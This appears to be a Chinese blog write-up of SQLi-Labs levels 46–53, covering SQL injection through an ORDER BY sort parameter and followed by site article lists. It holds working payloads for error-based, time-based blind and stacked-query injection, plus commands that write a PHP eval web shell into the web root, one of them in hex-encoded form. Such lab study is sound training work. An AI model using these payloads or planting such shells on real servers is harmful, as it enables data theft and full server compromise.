Less_46

补充知识:MySQL知识

SQL语句中,asc是指定列按升序排列,desc则是指定列 按降序排列;

Select * from users order by 1 desc; 使用降序进行排列;

Select * from users order by 1  asc; 使用升序进行排列;

Right() select right(database(),1)  从右往左数第一个数据库;

Left()   select left(database(),1)  从左往右数第一个数据库;

less46没有使用包裹

输入?id=1  得到下面,所以我们使用?sort=1  进行操作  其中1代表把第一列按从小到大进行排列;

修改为2,即为将第二列按从小到大进行排列;

?Sort=2 desc;  使用降序进行排列;

?Id=2 asc;    使用升序进行排列;

说明这里存在注入漏洞

三种方法:

1.报错注入

2.时间盲注

3.一句话木马

方法一:报错注入

输入:?sort=3 and  updatexml( 1, concat( 0x7e, (database())), 1) --+ 得到当前数据库;

输入:?sort=3 and  updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+ 得到第一个数据库名字;

方法二: 时间盲注

输入:?sort=3 and if(length(database()=1),1,sleep(5))--+

输入:?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'s',1,sleep(5))--+

方法三:一句话木马

输入 ?sort=3  and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+ 

我们并没有把一句话木马写进去,所以我们采取  lines  terminated by 0x 十六进制进行注入

输入 ?sort=3   into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

Less_47

Less47:使用’’包裹  其他与第46关基本一致

Less_48

Less48:  无包裹  不返回报错信息  不能使用报错注入,其他操作与第46关基本一致

 

Less_49

Less49:  使用“”包裹  不返回报错信息  不能使用报错注入,其他操作与第46关基本

Less_50

Less50无包裹

第50关与第46关不同的是 使用了mysqli_multi_query函数

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

所以我们可以用堆叠注入的方法;

五种方法:

1.时间的盲注

2.报错注入

3.写一句话木马

4.使用堆叠注入创建删除一个表

5.使用堆叠 注入写一句话木马

方法一:时间盲注

?sort=1 and if(length(database()>1),1,sleep(5)) --+

方法二:报错盲注

?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+

方法三:写一句话木马

输入:?sort=1  and (select '<?php @eval($_POST[ztt]);?>') into outfile 'C:\\phpStudy\\WWW\\a.php '--+

发现一句话木马并没有,输入:?sort=1   into outfile "C:\\phpStudy\\WWW\\a.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

方法四:使用堆叠注入创建一个表

?sort=3;create table ztt50 like users;insert into ztt50 select * from users;--+

Less_51

Less-51:  使用’’包裹  其他操作与第50关基本一致

五种方法:

1.时间的盲注

2.报错注入

3.写一句话木马

4.使用堆叠注入创建删除一个表

5.使用堆叠 注入写一句话木马

Less_52

Less-52:  无包裹  回显不显示错误  不能使用报错注入则其他方法与第50关基本一致

四种方法:

1.时间的盲注

2.写一句话木马

3.使用堆叠注入创建删除一个表

4.使用堆叠 注入写一句话木马

Less_53

Less-53:使用’’包裹  不回显错误  不能使用报错注入   其他方法与第50关基本一致

 

四种方法:

1.时间的盲注

2.写一句话木马

3.使用堆叠注入创建删除一个表

4.使用堆叠 注入写一句话木马

最新文章

  1. IOS学习之-私人通讯录
  2. Jmeter之参数化
  3. Android斗地主棋牌游戏牌桌实现源码下载
  4. Hbernate映射类型
  5. hdu1213 并查集(不压缩)
  6. -XX:+printGC
  7. [POI 2008][BZOJ 1132]Tro
  8. JSX架构及注释
  9. JavaScript 的原型对象 Prototype
  10. 搭建 Win CE6.0 设备开发环境
  11. 告别无止境的增删改查--Java代码生成器
  12. Open judge 07和为给定数
  13. JVM内存分配和回收
  14. POJ-1182 食物链(并查集)
  15. android之使用GridView+仿微信图片上传功能
  16. Hibernate第四篇【集合映射、一对多和多对一】
  17. js 关于日期,字符串转化
  18. geoserver发布瓦片,geoserver发布arcgis切片和geoserver发布金字塔切片
  19. 网络流24题——分配问题 luogu 4014
  20. 廖雪峰Java2-2数据封装-2构造方法

热门文章

  1. 优化公式排版和Beamer相关知识
  2. MongoDB的安装问题
  3. nginx配置长连接(ajax60秒请求超时)
  4. webpack 之搭建本地服务器
  5. JS高级---识别正则表达式是否匹配
  6. 2.js将Date对象转换成“2018-05-10”字符串格式化的时间
  7. 2019牛客多校第七场 F Energy stones 树状数组+算贡献转化模拟
  8. [一本通学习笔记] KMP算法
  9. pytorch save model + Gmatch4py + jupyter debugger + community structure
  10. 【原】librtmp源码详解